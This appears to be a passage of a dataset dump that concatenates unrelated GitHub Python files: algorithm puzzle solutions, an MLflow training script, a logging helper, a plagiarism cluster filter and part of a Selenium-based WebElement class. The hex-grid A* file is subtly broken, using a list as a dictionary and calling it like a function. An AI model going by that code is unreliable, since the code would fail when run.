왼쪽의 총 무게합 : left_sum, 오른쪽의 총 무게합 : right_sum, 앞으로 저울에 더 올려야 하는 무게추들 : remain\n# 일 때, 가능한 경우의 수를 구하는 함수\ndef dfs(left_sum, right_sum, remain):\n if not remain: # 저울에 전부 다 올린 경우\n return 1\n\n if left_sum >= half:\n return (2 ** len(remain)) * math.factorial(len(remain))\n\n result = 0\n for i in range(len(remain)):\n target = remain[i]\n next_remain = remain[:i] + remain[i + 1:] # i번째를 제외\n result += dfs(left_sum + target, right_sum, next_remain) # 왼쪽에 i번째 무게추를 더함\n if left_sum >= right_sum + target: # 오른쪽에 더할 수 있는 경우\n result += dfs(left_sum, right_sum + target, next_remain)\n\n return result\n\n\nif __name__ == \"__main__\":\n T = int(input())\n\n for test_case in range(1, T + 1):\n N = int(input())\n line = list(map(int, input().split()))\n half = (sum(line) + 1) // 2\n\n answer = dfs(0, 0, line)\n\n print(\"#{} {}\".format(test_case, answer))\n","repo_name":"ribo0715/algorithm_solution","sub_path":"SW Expert Academy/3234. 준환이의 양팔저울(수정).py","file_name":"3234. 준환이의 양팔저울(수정).py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3814599809","text":"import mlflow\nfrom sklearn.datasets import load_iris\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom dotenv import dotenv_values\n\n# Configuration of tracking server\n# config = dotenv_values(\".env\")\nconfig = dotenv_values(\".env.testing\")\nmlfow_server_ip = config[\"MLFOW_SERVER_IP\"]\nmlflow.set_tracking_uri(mlfow_server_ip)\n\n\n# Start experiment\nexperiment_name = \"iris_logistic_model\"\n\n# check if experiment exist\nexisting_exp = mlflow.get_experiment_by_name(experiment_name)\nif not existing_exp:\n mlflow.create_experiment(experiment_name)\n\nexperiment = mlflow.set_experiment(experiment_name)\n\nwith mlflow.start_run(experiment_id=experiment.experiment_id):\n\n # load the iris dataset\n iris = load_iris()\n\n # split the data into training and testing sets\n X_train, X_test, y_train, y_test = train_test_split(iris.data, iris.target, test_size=0.2, random_state=42)\n\n # create a logistic regression model\n lr = LogisticRegression(penalty=\"l2\", max_iter=200)\n\n # train the model on the training data\n lr.fit(X_train, y_train)\n\n # make predictions on the testing data\n y_pred = lr.predict(X_test)\n\n # calculate the accuracy score of the model\n accuracy = accuracy_score(y_test, y_pred)\n\n mlflow.log_param(\"penalty\", \"l2\")\n mlflow.log_param(\"max_iter\", 200)\n mlflow.log_metric(\"accuracy\", accuracy)\n\n mlflow.sklearn.log_model(lr, \"model\")\n","repo_name":"Ivanrs297/machine-learning-projects","sub_path":"MLOps/GCP-VirtualMachines/running-instance/examples/train_mlflow.py","file_name":"train_mlflow.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"20482474559","text":"\"\"\"#algo to find next permutation #TC O(n) #SC O(1)\ncette solution est pas du tout simple a trouver ou on a le pattern est c'est facile mais si on la pas c'est super complique (dans la solution officiel une enorme partie de la communaute\nse plein de la difficulter mais je fais cette exo car il est frequemment demander donc il faut retenir le patern qui est algo connu pour trouver le next permutation.)\npour comprendre voir l'animation de la solution officiel (j'ai aussi mit une photo sur git qui explique tres simplement le pattern.) les etapes de l'algo sont les suivante : \n- trouver le premier element de la partie decroissante en commancent par la fin.\n- trouver le successsor (cad l'element superieur qui vient juste apres) de l'element qui precede le premier element de la partie decroissante .\n- swap le succesor et l'element qui precede le premier element de la partie decroissante \n- reverse la partie decroissante \nle resulat va etre le successor. \nremarque: si arr est decroissant tel que par exemple 321 alors la next permutation est la premiere permutation cad 123 cad on fait seulement reverse sur arr.\n\"\"\"\n\n\nclass Solution:\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n i = j = len(nums)-1\n \n #trouver l'idx du premier element de la (premiere) partie decroissante en commancent par la fin \n while i > 0 and nums[i-1] >= nums[i]:\n i -= 1\n \n # si i==0 cad il ya pas de partie decroissante donc arr est croissante donc le next permutation est le reverse de arr\n if i == 0: # nums are in descending order\n nums.reverse() #TC:O(n) SC:O(1)\n return \n \n k = i - 1 # index de l'element qui precede l'idx du premier element de la (premiere) partie decroissante en commancent par la fin (on l'appelera pivot)\n # recherche idx du successor (j)\n while nums[j] <= nums[k]: #O(n)\n j -= 1\n \n # swap between pivot and successor\n nums[k], nums[j] = nums[j], nums[k] \n \n # reverse the second part\n l, r = k+1, len(nums)-1 \n while l < r: #O(n)\n nums[l], nums[r] = nums[r], nums[l]\n l +=1 ; r -= 1\n","repo_name":"rtn75000/leetcode-pb","sub_path":"31. Next Permutation/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18187630175","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nA module used to set up queues for logging using multiple threads.\nThis module sets up logging using a /logs directory and tees the log output\nto the stdout stream and a filestream. The log files are then named .log\nand are placed in the /logs directory. The logs directory is created in the working directory of the script that calls it.\n\"\"\"\nimport logging\nimport logging.handlers\n# Put all your imports here, one per line. However multiple imports from the same lib are allowed on a line.\nimport multiprocessing\nimport os\nimport smtplib\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\n\n# CONSTANTS. These should be all in upper case\nLOGGERNAME = None\n\n# Global variables\n\n# Class definitions\n\n\nclass BufferingSMTPHandler(logging.handlers.BufferingHandler):\n def __init__(self, mailhost, fromaddr, toaddrs, subject):\n # Set up the BufferingHandler with a capacity of 2048 log messages\n logging.handlers.BufferingHandler.__init__(self, 2048)\n self.mailhost = mailhost\n self.mailport = None\n self.fromaddr = fromaddr\n self.toaddrs = toaddrs\n self.subject = subject\n self.setFormatter(logging.Formatter(\"%(asctime)s %(levelname)-5s %(message)s\"))\n\n def flushoutput(self):\n # this method is automatically called\n # Send the log messages out to the email address specified\n if len(self.buffer) > 0:\n # Set the SMTP port\n port = self.mailport\n if not port:\n port = smtplib.SMTP_PORT\n # Connect to the SMTP mailhost\n smtp = smtplib.SMTP(self.mailhost, port)\n msg = \"From: %s\\r\\nTo: %s\\r\\nSubject: %s\\r\\n\\r\\n\" % (\n self.fromaddr,\n \",\".join(self.toaddrs),\n self.subject,\n )\n for record in self.buffer:\n s = self.format(record)\n msg = msg + s + \"\\r\\n\"\n smtp.sendmail(self.fromaddr, self.toaddrs, msg)\n smtp.quit()\n self.buffer = []\n\n\n# Put your function definitions here. These should be lower-case, separated by underscores.\n\n\ndef setup_logging(\n loggername=__name__,\n logdirparent=str(os.getcwd()),\n filelogginglevel=logging.DEBUG,\n stdoutlogginglevel=logging.DEBUG,\n smtploggingenabled=False,\n smtplogginglevel=logging.INFO,\n smtpmailhost=\"localhost\",\n smtpfromaddr=\"Python default email\",\n smtptoaddr=\"test@gmail.com\",\n smtpsubj=\"Test Python Email\",\n):\n \"\"\"Setup the logging module to write logs to several different streams\n\n :param modulename: [The name of the module calling this function], defaults to 'log'\n :type modulename: str, optional\n :param logdirparent: [description], defaults to str(os.getcwd())\n :type logdirparent: [type], optional\n :param filelogginglevel: [description], defaults to logging.DEBUG\n :type filelogginglevel: [type], optional\n :param stdoutlogginglevel: [description], defaults to logging.DEBUG\n :type stdoutlogginglevel: [type], optional\n :param smtploggingenabled: [description], defaults to False\n :type smtploggingenabled: bool, optional\n :param smtplogginglevel: [description], defaults to logging.INFO\n :type smtplogginglevel: [type], optional\n :param smtpmailhost: [description], defaults to 'localhost'\n :type smtpmailhost: str, optional\n :param smtpfromaddr: [description], defaults to 'Python default email'\n :type smtpfromaddr: str, optional\n :param smtptoaddr: [description], defaults to 'test@gmail.com'\n :type smtptoaddr: str, optional\n :param smtpsubj: [description], defaults to 'Test Python Email'\n :type smtpsubj: str, optional\n :return: [description]\n :rtype: [type]\n \"\"\"\n global LOGGERNAME\n LOGGERNAME = loggername\n # Set up a queue to take in logging messages from multiple threads\n q = multiprocessing.Queue()\n # set up a stream handler for stdout\n stdout_handler = logging.StreamHandler()\n # Set the format of the messages for logs\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n )\n stdout_handler.setFormatter(formatter)\n stdout_handler.setLevel(stdoutlogginglevel)\n mainlogger = logging.getLogger(LOGGERNAME)\n mainlogger.propagate = False\n if mainlogger.hasHandlers():\n mainlogger.handlers.clear()\n mainlogger.setLevel(logging.DEBUG)\n # add the handler to the logger so records from this process are handled\n mainlogger.addHandler(stdout_handler)\n # Check the current working directory for a 'logs' folder to store our logfiles\n logdirectory = logdirparent + os.path.sep + \"logs\"\n # Create the directory if it doesn't already exist\n Path(logdirectory).mkdir(parents=True, exist_ok=True)\n # Now add a log handler to output to a file\n # And set the name for the logfile to be created\n logfilename = logdirectory + os.path.sep + loggername + \".log\"\n logfilehandler = logging.handlers.RotatingFileHandler(\n logfilename, maxBytes=1000000, backupCount=5\n )\n # Set the format for file log output messages\n logfilehandler.setFormatter(formatter)\n # Set the level of logging for files\n logfilehandler.setLevel(filelogginglevel)\n # Add the log handler for files\n mainlogger.addHandler(logfilehandler)\n # ql gets records from the queue and sends them to the handler\n ql = logging.handlers.QueueListener(q, stdout_handler)\n ql.start()\n # Now set up the SMTP log handler\n if smtploggingenabled:\n smtploghandler = BufferingSMTPHandler(\n smtpmailhost, smtpfromaddr, smtptoaddr, smtpsubj\n )\n smtploghandler.setLevel(smtplogginglevel)\n mainlogger.addHandler(smtploghandler)\n mainlogger.info(\"Logging setup successfully!\")\n return ql, q, mainlogger\n\n\ndef flush_smtp_logger():\n # Find the SMTP log handler\n mainlogger = logging.getLogger(LOGGERNAME)\n for handler in mainlogger.handlers:\n if handler.__class__ == BufferingSMTPHandler:\n # and flush the messages\n handler.flushoutput()\n\n\ndef logging_worker_init(q):\n # the worker processes write logs into the q, which are then handled by this queuehandler\n qh = logging.handlers.QueueHandler(q)\n logger = logging.getLogger(LOGGERNAME)\n logger.addHandler(qh)\n # remove the default stdout handler\n for handler in logger.handlers:\n if handler.__class__ == logging.StreamHandler:\n logger.removeHandler(handler)\n pass\n","repo_name":"rishil321/trinistocks.com","sub_path":"trinistocks/scheduled_scripts/custom_logging.py","file_name":"custom_logging.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"9636684991","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 6 12:12:11 2019\r\n\r\n@author: Jerry\r\n\"\"\"\r\n\r\nfrom heapq import heappush, heappop\r\n\r\nclass Hexagon(object):\r\n g = 0\r\n h = 0\r\n def __init__(self, q, r):\r\n self.q = q\r\n self.r = r\r\n \r\n \r\nclass HexGrid(object):\r\n \r\n def heuristic(self, start, end):\r\n return (abs(start.q - end.q) \r\n + abs(start.q + start.r - end.q - end.r) \r\n + abs(start.r - end.r)) / 2\r\n \r\n def explore_neighbours(self, currv):\r\n # list of neighbours\r\n n = []\r\n moves = [(0,-1), (1,-1), (1,0), (0,1), (-1,1), (-1,0)]\r\n q = currv.q\r\n r = currv.r\r\n for dq, dr in moves:\r\n q2 = q + dq\r\n r2 = r + dr\r\n \r\n # Check that hex is within boundary\r\n if (q2 >= -3 and q2 <= 3) and (r2 >= -3 and r2 <= 3):\r\n adj = Hexagon(q2, r2)\r\n n.append(adj)\r\n return n\r\n \r\n\r\ndef AStarSearch(start, end, grid):\r\n \r\n # initialise tree\r\n start.g = 0\r\n start.h = grid.heuristic(start, end)\r\n start.f = start.g + start.h\r\n \r\n # Visited, but not expanded nodes\r\n openv = [] # a min-heap\r\n # Visited and expanded nodes\r\n closev = []\r\n # History of path\r\n camefrom = []\r\n \r\n # Insert start node to openv\r\n heappush(openv, (start.f, start))\r\n \r\n while openv:\r\n # Pop off node with lowest score\r\n currv = heappop(openv)[1]\r\n \r\n # Find neighbours\r\n neighbours = grid.explore_neighbours(currv)\r\n for node in neighbours:\r\n # If node is the exit square - soln found\r\n if currv == end:\r\n return track_path(camefrom, currv)\r\n \r\n node.g = currv.g + 1\r\n node.h = grid.heuristic(currv, end)\r\n node.f = node.g + node.h\r\n \r\n # If neighbour is already in open\r\n if node in openv:\r\n # this node already has a lower g, skip it\r\n index = openv.index(node)\r\n if openv[index].g <= node.g:\r\n continue\r\n \r\n elif node in closev:\r\n index = closev.index(node)\r\n # Skip if node in closed has lower g\r\n if closev[index].g <= node.g:\r\n continue\r\n # If a new shorter path has been found, add node back to open\r\n closev.remove(node)\r\n openv.append(node)\r\n \r\n \r\n else:\r\n heappush(openv, (node.f, node))\r\n # Record parent of neighbour\r\n camefrom[node] = currv\r\n \r\n # Add fully explored node to closed\r\n closev.append(currv)\r\n \r\n return \"no solution\"\r\n\r\ndef track_path(camefrom, currv):\r\n path = []\r\n # Backtrack path from current hexagon\r\n while currv in camefrom:\r\n path.append(currv)\r\n # Make current hexagon the parent\r\n currv = camefrom(currv)\r\n return path\r\n\r\n\r\n# Testing function\r\ngrid = HexGrid()\r\nstart = Hexagon(0,0)\r\nend = Hexagon(3,-1)\r\n\r\nAStarSearch(start, end, grid)","repo_name":"anemoiusjerry/AI-Proj-I-Checkers-Variation-Game","sub_path":"astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73741313544","text":"from __future__ import annotations\n\nfrom networkx import Graph, articulation_points, is_empty\n\nfrom plagdef.model.models import Cluster, RatedCluster\n\n\nclass ClusterFilter:\n def __init__(self, min_cluster_char_len: int):\n self._min_cluster_char_len = min_cluster_char_len\n\n def filter(self, clusters: set[Cluster]):\n resolved_clusters = _resolve_overlaps(clusters)\n return self._remove_small_clusters(resolved_clusters)\n\n def _remove_small_clusters(self, clusters: set[Cluster]) -> set[Cluster]:\n filtered_clusters = set()\n for cluster in clusters:\n cluster_char_lengths = cluster.char_lengths()\n if cluster_char_lengths[0] >= self._min_cluster_char_len \\\n and cluster_char_lengths[1] >= self._min_cluster_char_len:\n filtered_clusters.add(cluster)\n return filtered_clusters\n\n\ndef _resolve_overlaps(clusters: set[Cluster]) -> set[Cluster]:\n overlap_graph = _build_overlap_graph(clusters)\n cluster = _next_overlapping_cluster(overlap_graph)\n while cluster:\n ol_clusters = overlap_graph.adj[cluster]\n best_rated_cluster = RatedCluster(cluster, 0, 0)\n for ol_cluster in ol_clusters:\n better_rated_cluster = cluster.best_with_respect_to(ol_cluster)\n if better_rated_cluster > best_rated_cluster:\n best_rated_cluster = better_rated_cluster\n if cluster == best_rated_cluster:\n overlap_graph.remove_nodes_from(ol_clusters)\n else:\n overlap_graph.remove_node(cluster)\n cluster = _next_overlapping_cluster(overlap_graph)\n return set(overlap_graph)\n\n\ndef _build_overlap_graph(clusters: set[Cluster]) -> Graph:\n graph = Graph()\n for cluster in clusters:\n graph.add_node(cluster)\n for ol_cluster in clusters:\n if cluster != ol_cluster and cluster.overlaps_with(ol_cluster):\n graph.add_edge(cluster, ol_cluster)\n return graph\n\n\ndef _next_overlapping_cluster(graph: Graph):\n cluster = None\n if not is_empty(graph):\n try:\n cluster = next(articulation_points(graph))\n except StopIteration:\n cluster = max(graph.degree, key=lambda x: x[1])[0]\n return cluster\n","repo_name":"devWhyqueue/plagdef","sub_path":"plagdef/model/pipeline/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40088488447","text":"import time\nimport traceback\nimport warnings\nimport numpy as np\n\nfrom base64 import b64decode\nfrom collections import defaultdict\nfrom cdp_socket.exceptions import CDPError\n\n# driverless\nfrom selenium_driverless.types.by import By\nfrom selenium_driverless.types.deserialize import JSRemoteObj, StaleJSRemoteObjReference\nfrom selenium_driverless.scripts.geometry import gen_heatmap, gen_rand_point, centroid\n\n\nclass NoSuchElementException(Exception):\n pass\n\n\nclass StaleElementReferenceException(StaleJSRemoteObjReference):\n def __init__(self, elem):\n message = f\"Page or Frame has been reloaded, or the element removed, {elem}\"\n super().__init__(_object=elem, message=message)\n\n\nclass ElementNotVisible(Exception):\n pass\n\n\nclass ElementNotInteractable(Exception):\n def __init__(self, x: float, y: float, _type: str = \"interactable\"):\n super().__init__(f\"element not {_type} at x:{x}, y:{y}, it might be hidden under another one\")\n\n\nclass ElementNotClickable(ElementNotInteractable):\n def __init__(self, x: float, y: float):\n super().__init__(x, y, _type=\"clickable\")\n\n\n# noinspection PyProtectedMember\nclass WebElement(JSRemoteObj):\n \"\"\"Represents a DOM element.\n\n Generally, all interesting operations that interact with a document will be\n performed through this interface.\n\n All method calls will do a freshness check to ensure that the element\n reference is still valid. This essentially determines whether the\n element is still attached to the DOM. If this test fails, then an\n ``StaleElementReferenceException`` is thrown, and all future calls to this\n instance will fail.\n \"\"\"\n\n def __init__(self, target, frame_id: int or None, isolated_exec_id: int or None, obj_id=None,\n node_id=None, backend_node_id: str = None, loop=None, class_name: str = None,\n context_id: int = None, is_iframe: bool = False) -> None:\n self._loop = loop\n if not (obj_id or node_id or backend_node_id):\n raise ValueError(\"either js, obj_id or node_id need to be specified\")\n self._node_id = node_id\n self._backend_node_id = backend_node_id\n self._class_name = class_name\n self._started = False\n self.___context_id__ = context_id\n self._obj_ids = {context_id: obj_id}\n self.___frame_id__ = None\n self._is_iframe = is_iframe\n self._stale = False\n if obj_id and context_id:\n self._obj_ids[context_id] = obj_id\n self.___obj_id__ = None\n super().__init__(target=target, frame_id=frame_id, obj_id=obj_id, isolated_exec_id=isolated_exec_id)\n\n def __await__(self):\n return self.__aenter__().__await__()\n\n async def __aenter__(self):\n if not self._started:\n async def set_stale_frame(data):\n if data[\"frame\"][\"id\"] == self.___frame_id__:\n self._stale = True\n await self.__target__.remove_cdp_listener(\"Page.frameNavigated\", set_stale_frame)\n\n if not self.__target__._page_enabled:\n await self.__target__.execute_cdp_cmd(\"Page.enable\")\n await self.__target__.add_cdp_listener(\"Page.frameNavigated\", set_stale_frame)\n self._started = True\n\n return self\n\n @property\n async def obj_id(self):\n return await self.__obj_id_for_context__()\n\n @property\n async def context_id(self):\n self._check_stale()\n if not self.___context_id__:\n await self.obj_id\n return self.__context_id__\n\n def _check_stale(self):\n if self._stale:\n raise StaleElementReferenceException(elem=self)\n\n @property\n def _args_builder(self) -> dict:\n self._check_stale()\n if self._node_id:\n return {\"nodeId\": self._node_id}\n elif self.__obj_id__:\n return {\"objectId\": self.__obj_id__}\n elif self._backend_node_id:\n return {\"backendNodeId\": self._backend_node_id}\n else:\n raise ValueError(f\"missing remote element id's for {self}\")\n\n async def __obj_id_for_context__(self, context_id: int = None):\n self._check_stale()\n if not self._obj_ids.get(context_id):\n args = {}\n if self._backend_node_id:\n args[\"backendNodeId\"] = self._backend_node_id\n elif self._node_id:\n args[\"nodeId\"] = self._node_id\n else:\n raise ValueError(f\"missing remote element id's for {self}\")\n\n if context_id:\n args[\"executionContextId\"] = context_id\n try:\n res = await self.__target__.execute_cdp_cmd(\"DOM.resolveNode\", args)\n except CDPError as e:\n if e.code == -32000 and e.message == 'No node with given id found':\n raise StaleElementReferenceException(self)\n else:\n raise e\n obj_id = res[\"object\"].get(\"objectId\")\n if obj_id:\n if self.__context_id__ == context_id:\n self.___obj_id__ = obj_id\n self._obj_ids[context_id] = obj_id\n class_name = res[\"object\"].get(\"className\")\n if class_name:\n self._class_name = class_name\n return self._obj_ids.get(context_id)\n\n @property\n def __context_id__(self):\n if self.__obj_id__:\n return int(self.__obj_id__.split(\".\")[1])\n else:\n return self.___context_id__\n\n @property\n async def node_id(self):\n self._check_stale()\n if not self._node_id:\n node = await self.__target__.execute_cdp_cmd(\"DOM.requestNode\", {\"objectId\": await self.obj_id})\n self._node_id = node[\"nodeId\"]\n return self._node_id\n\n @property\n async def __frame_id__(self) -> int:\n if not self.___frame_id__:\n await self._describe()\n return self.___frame_id__\n\n @property\n async def content_document(self):\n \"\"\"\n gets the document of the iframe\n \"\"\"\n _desc = await self._describe()\n if _desc.get(\"localName\") == \"iframe\":\n node = _desc.get(\"contentDocument\")\n if node:\n frame_id = _desc.get(\"frameId\")\n if node['documentURL'] == 'about:blank':\n # wait for frame to load\n if not self.__target__._page_enabled:\n await self.__target__.execute_cdp_cmd(\"Page.enable\")\n async for data in await self.__target__.get_cdp_event_iter(\"Page.frameNavigated\"):\n frame = data[\"frame\"]\n if frame[\"id\"] == frame_id:\n break\n self._stale = False\n _desc = await self._describe()\n node = _desc.get(\"contentDocument\")\n if self._loop:\n from selenium_driverless.sync.webelement import WebElement as SyncWebElement\n return await SyncWebElement(backend_node_id=node.get('backendNodeId'),\n target=self.__target__, loop=self._loop,\n class_name='HTMLIFrameElement',\n isolated_exec_id=None, frame_id=frame_id)\n else:\n return await WebElement(backend_node_id=node.get('backendNodeId'),\n target=self.__target__, loop=self._loop,\n class_name='HTMLIFrameElement',\n isolated_exec_id=None, frame_id=frame_id)\n\n # different target for cross-site\n targets = await self.__target__.get_targets_for_iframes([self])\n if targets:\n return await targets[0]._document_elem\n\n @property\n async def document_url(self):\n res = await self._describe()\n return res.get('documentURL')\n\n @property\n async def backend_node_id(self):\n if not self._backend_node_id:\n await self._describe()\n return self._backend_node_id\n\n @property\n def class_name(self):\n return self._class_name\n\n async def find_element(self, by: str, value: str, idx: int = 0, timeout: int or None = None):\n \"\"\"Find an element given a By strategy and locator.\n\n :Usage:\n ::\n\n element = element.find_element(By.ID, 'foo')\n\n :rtype: WebElement\n \"\"\"\n elems = []\n start = time.monotonic()\n while not elems:\n elems = await self.find_elements(by=by, value=value)\n if (not timeout) or (time.monotonic() - start) > timeout:\n break\n if not elems:\n raise NoSuchElementException()\n return elems[idx]\n\n async def find_elements(self, by: str = By.ID, value: str or None = None):\n \"\"\"Find elements given a By strategy and locator.\n\n :Usage:\n ::\n\n element = element.find_elements(By.CLASS_NAME, 'foo')\n\n :rtype: list of WebElement\n \"\"\"\n from selenium_driverless.types.by import By\n\n if by == By.ID:\n by = By.XPATH\n value = f'//*[@id=\"{value}\"]'\n elif by == By.CLASS_NAME:\n by = By.XPATH\n value = f'//*[@class=\"{value}\"]'\n elif by == By.NAME:\n by = By.XPATH\n value = f'//*[@name=\"{value}\"]'\n\n if by == By.TAG_NAME:\n return await self.execute_script(\"return obj.getElementsByTagName(arguments[0])\",\n value, serialization=\"deep\", unique_context=True, timeout=10)\n elif by == By.CSS_SELECTOR:\n elems = []\n node_id = await self.node_id\n res = await self.__target__.execute_cdp_cmd(\"DOM.querySelectorAll\", {\"nodeId\": node_id,\n \"selector\": value}, timeout=2)\n node_ids = res[\"nodeIds\"]\n for node_id in node_ids:\n if self._loop:\n from selenium_driverless.sync.webelement import WebElement as SyncWebElement\n # noinspection PyUnresolvedReferences\n elem = SyncWebElement(node_id=node_id, target=self.__target__, loop=self._loop,\n context_id=self.__context_id__,\n frame_id=await self.__frame_id__, isolated_exec_id=self.___isolated_exec_id__)\n else:\n # noinspection PyUnresolvedReferences\n elem = await WebElement(node_id=node_id, target=self.__target__, context_id=self.__context_id__,\n isolated_exec_id=self.___isolated_exec_id__,\n frame_id=await self.__frame_id__)\n elems.append(elem)\n return elems\n elif by == By.XPATH:\n script = \"\"\"return document.evaluate(\n arguments[0],\n obj,\n null,\n XPathResult.ORDERED_NODE_SNAPSHOT_TYPE,\n null,\n );\"\"\"\n return await self.execute_script(script, value, serialization=\"deep\", timeout=10, unique_context=True)\n else:\n return ValueError(\"unexpected by\")\n\n async def _describe(self):\n args = {\"pierce\": True}\n args.update(self._args_builder)\n res = await self.__target__.execute_cdp_cmd(\"DOM.describeNode\", args)\n res = res[\"node\"]\n self._backend_node_id = res[\"backendNodeId\"]\n self._node_id = res[\"nodeId\"]\n self.___frame_id__ = res.get(\"frameId\")\n return res\n\n async def get_listeners(self, depth: int = 3):\n res = await self.__target__.execute_cdp_cmd(\n \"DOMDebugger.getEventListeners\", {\"objectId\": await self.obj_id, \"depth\": depth, \"pierce\": True})\n return res['listeners']\n\n @property\n async def source(self):\n args = self._args_builder\n res = await self.__target__.execute_cdp_cmd(\"DOM.getOuterHTML\", args)\n return res[\"outerHTML\"]\n\n async def set_source(self, value: str):\n await self.__target__.execute_cdp_cmd(\"DOM.setOuterHTML\", {\"nodeId\": await self.node_id, \"outerHTML\": value})\n\n async def get_property(self, name: str) -> str or None:\n \"\"\"Gets the given property of the element.\n\n :Args:\n - name - Name of the property to retrieve.\n\n :Usage:\n ::\n\n text_length = target_element.get_property(\"text_length\")\n \"\"\"\n return await self.execute_script(f\"return obj[arguments[0]]\", name)\n\n @property\n async def tag_name(self) -> str:\n \"\"\"This element's ``tagName`` property.\"\"\"\n node = await self._describe()\n return node[\"localName\"]\n\n @property\n async def text(self) -> str:\n \"\"\"The text of the element.\"\"\"\n return await self.get_property(\"textContent\")\n\n @property\n async def value(self) -> str:\n \"\"\"The value of the element.\"\"\"\n return await self.get_property(\"value\")\n\n async def clear(self) -> None:\n \"\"\"Clears the text if it's a text entry element.\"\"\"\n await self.execute_script(\"obj.value = ''\", unique_context=True)\n\n async def remove(self):\n await self.__target__.execute_cdp_cmd(\"DOM.removeNode\", {\"nodeId\": await self.node_id})\n\n async def highlight(self, highlight=True):\n if not self.__target__._dom_enabled:\n await self.__target__.execute_cdp_cmd(\"DOM.enable\")\n if highlight:\n args = self._args_builder\n args[\"highlightConfig\"] = {\n \"showInfo\": True,\n \"borderColor\": {\n \"r\": 76, \"g\": 175, \"b\": 80, \"a\": 1\n },\n \"contentColor\": {\n \"r\": 76, \"g\": 175, \"b\": 80,\n \"a\": 0.24\n },\n \"shapeColor\": {\n \"r\": 76, \"g\": 175, \"b\": 80,\n \"a\": 0.24\n }\n }\n await self.__target__.execute_cdp_cmd(\"Overlay.enable\")\n await self.__target__.execute_cdp_cmd(\"Overlay.highlightNode\", args)\n else:\n await self.__target__.execute_cdp_cmd(\"Overlay.disable\")\n\n async def focus(self):\n args = self._args_builder\n return await self.__target__.execute_cdp_cmd(\"DOM.focus\", args)\n\n async def is_clickable(self, listener_depth=3):\n _type = await self.tag_name\n if _type in [\"a\", \"button\", \"command\", \"details\", \"input\", \"select\", \"textarea\", \"video\", \"map\"]:\n return True\n is_clickable: bool = listener_depth is None\n if not is_clickable:\n listeners = await self.get_listeners(depth=listener_depth)\n for listener in listeners:\n _type = listener[\"type\"]\n if _type in [\"click\", \"mousedown\", \"mouseup\"]:\n is_clickable = True\n break\n return is_clickable\n\n async def click(self, timeout: float = None, bias: float = 5, resolution: int = 50, debug: bool = False,\n scroll_to=True, move_to: bool = True, ensure_clickable: bool or int = False) -> None:\n \"\"\"Clicks the element.\"\"\"\n if scroll_to:\n await self.scroll_to()\n\n x, y = await self.mid_location(bias=bias, resolution=resolution, debug=debug)\n if ensure_clickable:\n is_clickable = await self.is_clickable()\n if not is_clickable:\n raise ElementNotClickable(x, y)\n\n await self.__target__.pointer.click(x, y=y, click_kwargs={\"timeout\": timeout}, move_to=move_to)\n\n async def write(self, text: str):\n await self.focus()\n await self.__target__.execute_cdp_cmd(\"Input.insertText\", {\"text\": text})\n\n async def send_keys(self, value: str) -> None:\n # noinspection GrazieInspection\n \"\"\"Simulates typing into the element.\n\n :Args:\n - value - A string for typing, or setting form fields. For setting\n file inputs, this could be a local file path.\n\n Use this to send simple key events or to fill out form fields::\n\n form_textfield = target.find_element(By.NAME, 'username')\n form_textfield.send_keys(\"admin\")\n\n This can also be used to set file inputs.\n\n ::\n\n file_input = target.find_element(By.NAME, 'profilePic')\n file_input.send_keys(\"path/to/profilepic.gif\")\n # Generally it's better to wrap the file path in one of the methods\n # in os.path to return the actual path to support cross OS testing.\n # file_input.send_keys(os.path.abspath(\"path/to/profilepic.gif\"))\n \"\"\"\n # transfer file to another machine only if remote target is used\n # the same behaviour as for java binding\n raise NotImplementedError(\"you might use elem.write() for inputs instead\")\n\n async def mid_location(self, bias: float = 5, resolution: int = 50, debug: bool = False):\n \"\"\"\n returns random location in element with probability close to the middle\n \"\"\"\n\n box = await self.box_model\n vertices = box[\"content\"]\n if bias and resolution:\n heatmap = gen_heatmap(vertices, num_points=resolution)\n exc = None\n try:\n point = gen_rand_point(vertices, heatmap, bias_value=bias)\n points = np.array([point])\n except Exception as e:\n points = np.array([[100, 100]])\n exc = e\n if debug:\n from selenium_driverless.scripts.geometry import visualize\n visualize(points, heatmap, vertices)\n if exc:\n traceback.print_exc()\n warnings.warn(\"couldn't get random point based on heatmap\")\n point = centroid(vertices)\n else:\n point = centroid(vertices)\n\n # noinspection PyUnboundLocalVariable\n x = int(point[0])\n y = int(point[1])\n return [x, y]\n\n async def submit(self):\n \"\"\"Submits a form.\"\"\"\n script = (\n \"/* submitForm */var form = this;\\n\"\n 'while (form.nodeName != \"FORM\" && form.parentNode) {\\n'\n \" form = form.parentNode;\\n\"\n \"}\\n\"\n \"if (!form) { throw Error('Unable to find containing form element'); }\\n\"\n \"if (!form.ownerDocument) { throw Error('Unable to find owning document'); }\\n\"\n \"var e = form.ownerDocument.createEvent('Event');\\n\"\n \"e.initEvent('submit', true, true);\\n\"\n \"if (form.dispatchEvent(e)) { HTMLFormElement.prototype.submit.call(form) }\\n\"\n )\n return await self.execute_script(script, unique_context=True)\n\n @property\n async def dom_attributes(self) -> dict:\n try:\n res = await self.__target__.execute_cdp_cmd(\"DOM.getAttributes\", {\"nodeId\": await self.node_id})\n attr_list = res[\"attributes\"]\n attributes_dict = 